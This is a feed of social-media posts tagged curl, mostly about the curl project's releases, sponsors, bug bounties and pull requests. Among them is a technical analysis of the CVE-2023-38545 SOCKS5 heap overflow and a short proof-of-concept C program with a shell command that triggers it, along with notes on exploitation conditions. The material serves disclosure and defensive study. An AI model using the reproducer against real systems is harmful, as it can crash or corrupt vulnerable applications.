Search

Items tagged with: curl

#curl @daniel:// stenberg://

#curl

Why did the #curl #CVE202338545 vulnerability hide from static analysis tools?

The main reason for this is the type of code structure in question. In general state engines are quite difficult for static analysis tools, since as the name implies the state of the various variables depend on runtime state changes.

The code attempts to determine whether it is safe to use the provided host name for remote resolution. Since the code does not function correctly with host names longer than 255 characters, it falls back to using “socks5://” protocol (local name resolution) if the host name is longer. When the name is too long, the code forces “local name resolution” by setting “socks5_resolve_local” variable to TRUE.

Unfortunately this “socks5_resolve_local” variable isn’t stored in the “socks_state” structure as it should have been. For each state “step” the initial value for the variable is determined with:

bool socks5_resolve_local =
(conn->socks_proxy.proxytype == CURLPROXY_SOCKS5) ? TRUE : FALSE;

The INIT state then set the “socks5_resolve_local” to TRUE if the host name is too long:

/* RFC1928 chapter 5 specifies max 255 chars for domain name in packet */
if(!socks5_resolve_local && hostname_len > 255) {
infof(data, "SOCKS5: server resolving disabled for hostnames of "
"length > 255 [actual len=%zu]", hostname_len);
socks5_resolve_local = TRUE;
}

But this check is *only* done in INIT state. When the state is anything else, the initial value is used.

Now, later CONNECT_RESOLVE_REMOTE state checks if remote name resolution should be used or not:

if(!socks5_resolve_local) {
if (… sx->hostname is literal IPv6 address …) {
… use ipv6 address direct …
}
else if (… sx->hostname is literal IPv4 address …) {
… use ipv4 address direct …
}
else {
socksreq[len++] = 3;
socksreq[len++] = (char) hostname_len; /* one byte address length */
memcpy(&socksreq[len], sx->hostname, hostname_len); /* w/o NULL */
len += hostname_len;
}
}
As “socks5_resolve_local” flag is FALSE for the excessively long hostname the “socksreq” heap buffer will be overflown by the memcpy call.

There is no obvious way for the static analysis tools to determine that “socks5_resolve_local” might be set incorrectly for some of the states. Runtime #fuzzing will find this flaw quite easily, but unfortunately no fuzzing was performed for this specific functionality.

#vulnerability #staticanalysis #infosec

A page from the Harvard Mark II electromechanical computer's log, featuring a dead moth that was removed from the device.
#infosec #vulnerability #curl #cve202338545 #fuzzing #staticanalysis

I'll get the stream up at twitch.tv/curlhacker in a few minutes and do the #curl release presentation there at the top of the hour.

curlhacker - Twitch

I'm Daniel Stenberg, maintainer and lead developer in the curl project. I stream curl related stuff. Release presentations, curl development and related topics.
Twitch
#curl

#curl

Here’s a quick proof of concept to reproduce the #curl #CVE202338545 #heapoverflow #vulnerability. This PoC expects localhost to run a #socks5 proxy:

gcc -xc -fsanitize=address - -lcurl <<EOF
# include <curl/curl.h>
# include <string.h>
int main(void)
{
CURL *curl = curl_easy_init();
if(curl) {
char url[32768];
memcpy(url, "https://", 8);
memset(url + 8, 'A', sizeof(url) - 8 - 1);
url[sizeof(url) - 1] = '\0';
curl_easy_setopt(curl, CURLOPT_URL, url);
(void)curl_easy_perform(curl);
curl_easy_cleanup(curl);
}
return 0;
}
EOF
https_proxy=socks5h://127.0.0.1 ./a.out

Some comments:
• Application must use socks5h proxy to be vulnerable (it can be via proxy env variables or by explicitly settings the proxy options inside the app).
• Application must either fetch the attacker provided URL or follow redirects controlled by the attacker.
• Exploitation is made slightly more complicated due to this being a heap buffer overflow (many libc have built-in heap sanity checks). On modern systems with address space layout randomization (ASLR) an additional information leak is likely required for successful exploitation.
• Certain combinations of libcurl, platform and/or application options are not affected. See the advisory at curl.se/docs/CVE-2023-38545.ht… for more details.

#infosec

libcurl CVE-2023-38545 heap overflow detected by ASan.

curl - SOCKS5 heap buffer overflow - CVE-2023-38545

curl.se
#infosec #vulnerability #curl #cve202338545 #heapoverflow #socks5

#curl

#curl is authored by 1,200 individuals so far
#curl

Official #curl sponsors Oct 2023
Official curl sponsors Oct 2023 wolfSSL, Haxx, Fastly, Kirei, TeamViewer, Elastic and a set of awesome silver sponsors
#curl

#curl

#curl

#curl has awarded peeps more than 63,000 USD in bug bounties so far - excluding the upcoming new CVE which alone will get the new curl record bug-bounty of 4,600 USD

This is one reason why #curl gets so much scrutiny.

#curl

I think an entry on curl.se/news.html should notify about the upcoming important release.

I originally went there to find out at which time on October the fix will be released. Can you at least name a time window?

#curl

curl - News!

curl.se
#curl

#firefox #curl #ech

#curl

#curl

#curl

#curl

#curl #inbox

#curl

#security #vulnerability #curl

#curl

At this point, it would be easier to create a list of devices that are _NOT_ using #curl 😆
#curl

#curl

To date, I have made 163 videos that almost all are about #curl and #libcurl and you find them here: youtube.com/c/DanielStenberg

Daniel Stenberg

I talk about curl, open source, networking and stuff like that from my view and angle from my home in Stockholm, Sweden. I'm the lead developer of curl. I'm occasionally live-streaming curl development on twitch: https://www.twitch.
YouTube
#curl #libcurl

#curl

#curl

#curl

I'll live-stream the #curl release presentation today, starting in ~90 minutes (10:00 CEST) over on twitch: twitch.tv/curlhacker

curlhacker - Twitch

I'm Daniel Stenberg, maintainer and lead developer in the curl project. I stream curl related stuff. Release presentations, curl development and related topics.
Twitch
#curl

#curl

#curl

The #curl sponsors July 2023
#curl

Tomorrow we will ship #curl 8.2.0. Buckle up!
#curl

#curl

#curl

#curl

I closed the #gemini PR for #curl just now with no action, but I'm encouraging a new one to get filed later on when ready for the next step: github.com/curl/curl/pull/1117…

New Protocol: Gemini by jecxjo · Pull Request #11170 · curl/curl

A command line tool and library for transferring data with URL syntax, supporting DICT, FILE, FTP, FTPS, GOPHER, GOPHERS, HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, MQTT, POP3, POP3S, RTMP, RTMPS, RTSP, SCP, SFTP, SMB, SMBS, SMTP, SMTPS, TELNET, TFTP, WS…
GitHub
#gemini #curl

I'm looking for someone who wants to implement this callback for #curl #websocket support: github.com/curl/curl/issues/11…

It might be the last missing feature before we can enable it (the websocket API) by default.


Websocket message callback is not called on connect · Issue #11402 · curl/curl

I did this I started with the websocket-cb example and connected to an echo websocket server for testing. I expected the following I expected the data callback to be called once the connection is e...
GitHub
#curl #websocket

#curl